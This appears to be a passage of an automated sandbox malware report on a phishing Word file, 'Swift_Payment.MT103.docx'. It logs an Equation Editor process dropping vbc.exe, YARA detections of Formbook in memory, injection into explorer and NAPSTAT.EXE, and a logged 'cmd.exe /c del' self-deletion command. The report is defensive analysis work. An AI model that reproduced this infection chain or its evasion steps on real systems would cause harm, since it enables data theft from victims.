Source: C:\Users\Public\vbc.exe	Code function: 5_2_04314A00	5_2_04314A00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04313270	5_2_04313270
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04316260	5_2_04316260
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04315648	5_2_04315648
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04317ED8	5_2_04317ED8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_043143B0	5_2_043143B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_04314FE0	5_2_04314FE0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_043143C0	5_2_043143C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040102E	6_2_0040102E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041E965	6_2_0041E965
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041E9BB	6_2_0041E9BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041D2F5	6_2_0041D2F5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041D541	6_2_0041D541
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041E58E	6_2_0041E58E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00409E40	6_2_00409E40
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041D603	6_2_0041D603
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00409E3C	6_2_00409E3C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A0E0C6	6_2_00A0E0C6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A3D005	6_2_00A3D005
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A13040	6_2_00A13040
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A2905A	6_2_00A2905A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A0E2E9	6_2_00A0E2E9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00AB1238	6_2_00AB1238
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00AB63BF	6_2_00AB63BF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A0F3CF	6_2_00A0F3CF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A363DB	6_2_00A363DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A12305	6_2_00A12305
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A5A37B	6_2_00A5A37B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A17353	6_2_00A17353
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A45485	6_2_00A45485
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A21489	6_2_00A21489
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A9443E	6_2_00A9443E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A4D47D	6_2_00A4D47D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A2C5F0	6_2_00A2C5F0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A1351F	6_2_00A1351F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A56540	6_2_00A56540
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A14680	6_2_00A14680
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A1E6C1	6_2_00A1E6C1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00AB2622	6_2_00AB2622
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A5A634	6_2_00A5A634
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A1C7BC	6_2_00A1C7BC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A9579A	6_2_00A9579A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A457C3	6_2_00A457C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00AAF8EE	6_2_00AAF8EE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A3286D	6_2_00A3286D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A1C85C	6_2_00A1C85C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A129B2	6_2_00A129B2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00AB098E	6_2_00AB098E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A269FE	6_2_00A269FE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A9394B	6_2_00A9394B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A95955	6_2_00A95955
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00AC3A83	6_2_00AC3A83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00ABCBA4	6_2_00ABCBA4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A9DBDA	6_2_00A9DBDA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A0FBD7	6_2_00A0FBD7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A37B00	6_2_00A37B00
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00AAFDDD	6_2_00AAFDDD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A40D3B	6_2_00A40D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A1CD5B	6_2_00A1CD5B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A42E2F	6_2_00A42E2F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A2EE4C	6_2_00A2EE4C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00AACFB1	6_2_00AACFB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A82FDC	6_2_00A82FDC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A20F3F	6_2_00A20F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F2E0C6	8_2_01F2E0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F4905A	8_2_01F4905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F33040	8_2_01F33040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F5D005	8_2_01F5D005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F563DB	8_2_01F563DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F2F3CF	8_2_01F2F3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FD63BF	8_2_01FD63BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F7A37B	8_2_01F7A37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F37353	8_2_01F37353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F32305	8_2_01F32305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F2E2E9	8_2_01F2E2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FD1238	8_2_01FD1238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F4C5F0	8_2_01F4C5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F76540	8_2_01F76540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F3351F	8_2_01F3351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F65485	8_2_01F65485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F41489	8_2_01F41489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F6D47D	8_2_01F6D47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FB443E	8_2_01FB443E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F657C3	8_2_01F657C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F3C7BC	8_2_01F3C7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FB579A	8_2_01FB579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F3E6C1	8_2_01F3E6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F34680	8_2_01F34680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F7A634	8_2_01F7A634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FD2622	8_2_01FD2622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F469FE	8_2_01F469FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F329B2	8_2_01F329B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FD098E	8_2_01FD098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FB5955	8_2_01FB5955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FB394B	8_2_01FB394B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FCF8EE	8_2_01FCF8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F5286D	8_2_01F5286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F3C85C	8_2_01F3C85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FBDBDA	8_2_01FBDBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F2FBD7	8_2_01F2FBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FDCBA4	8_2_01FDCBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F57B00	8_2_01F57B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FE3A83	8_2_01FE3A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FCFDDD	8_2_01FCFDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F3CD5B	8_2_01F3CD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F60D3B	8_2_01F60D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FA2FDC	8_2_01FA2FDC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01FCCFB1	8_2_01FCCFB1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F5DF7C	8_2_01F5DF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F40F3F	8_2_01F40F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F4EE4C	8_2_01F4EE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F62E2F	8_2_01F62E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009D2F5	8_2_0009D2F5
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009D541	8_2_0009D541
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009E58E	8_2_0009E58E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009D603	8_2_0009D603
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009E965	8_2_0009E965
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009E9BB	8_2_0009E9BB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00082D90	8_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00089E3C	8_2_00089E3C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00089E40	8_2_00089E40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00082FB0	8_2_00082FB0

Source: C:\Users\Public\vbc.exe	Code function: String function: 00A0DF5C appears 115 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A7F970 appears 82 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A53F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A5373B appears 235 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A0E2A8 appears 37 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 01F2DF5C appears 120 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 01F9F970 appears 84 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 01F7373B appears 245 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 01F2E2A8 appears 38 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 01F73F92 appears 132 times

Source: vbc[1].exe.3.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: vbc[1].exe.3.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: vbc[1].exe.3.dr, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: vbc[1].exe.3.dr, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.0.vbc.exe.1f0000.1.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.0.vbc.exe.1f0000.1.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.0.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.0.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'

Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOCX@9/23@13/4

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ift_Payment.MT103.docx

Jump to behavior

Source: C:\Users\Public\vbc.exe

Mutant created: \Sessions\1\BaseNamedObjects\mqvIwCkFomoGxRNwcXSdpu

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRB22E.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: Swift_Payment.MT103.docx

Virustotal: Detection: 8%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

